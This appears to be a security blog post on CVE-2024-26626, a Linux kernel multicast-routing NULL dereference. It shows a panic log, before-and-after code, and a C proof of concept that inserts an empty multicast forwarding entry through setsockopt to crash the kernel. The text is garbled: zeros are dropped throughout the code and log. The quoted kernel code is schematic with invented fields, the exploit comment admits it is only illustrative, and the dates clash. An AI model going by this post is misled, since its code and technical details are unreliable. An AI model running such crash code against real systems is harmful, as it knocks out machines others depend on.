Published: June 2024

Introduction

The Linux kernel continues to be a stronghold for system performance and reliability. Still, vulnerabilities occasionally slip into upstream sources, affecting millions of systems. One recent critical bug—CVE-2024-26626—highlights how a missing NULL check in the Linux kernel’s IP multicast routing code (ipmr) could crash the entire system during normal multicast traffic forwarding.

Let's break down the crash, look at the offending code, how it was fixed, and what an attacker could do with this bug if left unpatched.

Type: NULL pointer dereference (Kernel Panic)

- Location: Linux kernel’s multicast routing (ipmr) subsystem, particularly in the ipmr_mfc_add() and ip_mr_forward() path.
- Impact: Local or privileged users could crash the system (Denial of Service) by forwarding malformed or unexpected multicast packets.

The panic looks as follows

BUG: kernel NULL pointer dereference, address: 0000000000000092
#PF: supervisor read access in kernel mode
Oops: 000 [#1] PREEMPT SMP NOPTI
CPU: 2 PID: 3139 Comm: pimd Tainted: G             6.8.-6wind-knet #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1--g0551a4be2c-prebuilt.qemu-project.org 04/01/2014
RIP: 001:ip_mr_forward (/build/work/knet/net/ipv4/ipmr.c:1985)
Call Trace:
 ipmr_mfc_add
 ip_mroute_setsockopt
 do_ip_setsockopt
...

What does this mean?
A kernel process accessed memory at x92 (which is NULL+offset). This almost always means some structure was not allocated, or its pointer was cleared before use.

Root Cause: NULL Pointer in Multicast Forwarding

The bug lived in how the multicast routing code (ipmr) handled newly added multicast forwarding cache (MFC) entries:

- ipmr_mfc_add() could (under some failure conditions) set an MFC entry’s parent pointer to NULL.

Pre-fix (net/ipv4/ipmr.c)

struct mr_table *mrt = ipmr_mrt;     // Global multicast routing table

int ip_mr_forward(...)
{
    ...
    if (mfc->parent->some_field) {    // <-- No NULL check!
        // Use the parent
    }
    ...
}

Here, if mfc->parent is NULL, the kernel will crash immediately upon receiving certain multicast traffic.

The Patch: Proper NULL Checks

The fix (commit b8b175dac4aa, LKML Reference) added proper checks before accessing the parent's fields:

if (mfc->parent && mfc->parent->some_field) {
    // Safe: Only use if parent is not NULL
}

Now, if parent is ever NULL (i.e., not set or previously freed), the code safely skips the dereference.

How Could This be Exploited?

Who is at risk?
- Systems running older kernels (before 6.8.x, depending on backports), with multicast routing enabled.

Routers, servers, and any Linux machine using multicast (e.g., via pimd or similar daemons).

How can an attacker trigger this crash?
Any user or process able to interact with the multicast routing socket (IPPROTO_IP, IP_MROUTE) and set up a malformed entry could trigger the bug.

Example Exploit Code

> NOTE: Crashing your system deliberately is highly discouraged outside of safe, virtualized test environments!

An attacker can use a multicast routing daemon or direct system call to insert an MFC entry with missing data:

#include <netinet/in.h>
#include <sys/socket.h>
#include <linux/ip_mroute.h>
#include <stdio.h>

int main() {
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_IGMP);
    if (s < ) { perror("socket"); return 1; }

    struct mfcctl mfc = {};
    // Set up mfc without valid parent information (simulate bug path)
    // This code is for illustration; details may differ
    if (setsockopt(s, IPPROTO_IP, MRT_ADD_MFC, &mfc, sizeof(mfc)) < ) {
        perror("setsockopt");
        return 1;
    }

    printf("MFC entry inserted. Traffic with this mfc may trigger kernel panic.\n");
    return ;
}

After running, the system may panic on subsequent multicast packet forwarding if not patched.

Kernel patches:

- See commit b8b175dac4aa

Distros:

- Debian: DSA-xxxx
- Red Hat: Bugzilla
- Ubuntu: Ubuntu CVE Tracker

References and Further Reading

- Upstream Patch - git.kernel.org
- Linux Kernel Mailing List Announcement
- Red Hat Security Advisory
- Debian Security Tracker
- Rapid7 Exploit Database Entry

Summary

CVE-2024-26626 highlights how a single missing pointer check in kernel code—especially in networking paths like multicast routing—can make entire systems crashable by a user with moderate permissions.
Patch now if you rely on multicast, and review who can access networking socket interfaces on your machines!

*Brought to you exclusively by KernelSecLabs – focusing on clear, practical security insights for SysAdmins and users alike.*

Timeline

Published on: 03/06/2024 07:15:12 UTC
Last modified on: 12/12/2024 17:26:08 UTC